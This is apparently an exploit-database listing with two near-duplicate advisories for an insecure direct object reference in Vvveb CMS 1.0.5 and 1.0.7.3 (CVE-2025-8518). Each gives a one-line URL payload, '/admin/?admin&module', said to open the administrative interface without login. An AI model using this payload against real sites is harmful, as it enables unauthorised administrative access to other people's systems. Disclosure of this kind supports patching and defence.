Share
## https://sploitus.com/exploit?id=PACKETSTORM:216876
=============================================================================================================================================
    | # Title     : Vvveb CMS 1.0.5 idor                                                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.vvveb.com/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/210781/ & CVE-2025-8518
    
    [+] Summary    : suffers from an insecure direct object reference that allows users to access the administrative interface.
    
    [+] POC : Payload = /admin/?admin&module
    
    use = https://127.0.0.1/nicolinc.couk/admin/?admin&module
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
    
    
    
    =============================================================================================================================================
    | # Title     : Vvveb CMS 1.0.7.3 Idor                                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.vvveb.com/update.json                                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/210781/ & CVE-2025-8518
    
    [+] Summary    : suffers from an insecure direct object reference that allows users to access the administrative interface Without Interact.
    
    [+] POC : Payload = /admin/?admin&module
    
    use = https://127.0.0.1/nicolinc.couk/admin/?admin&module
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================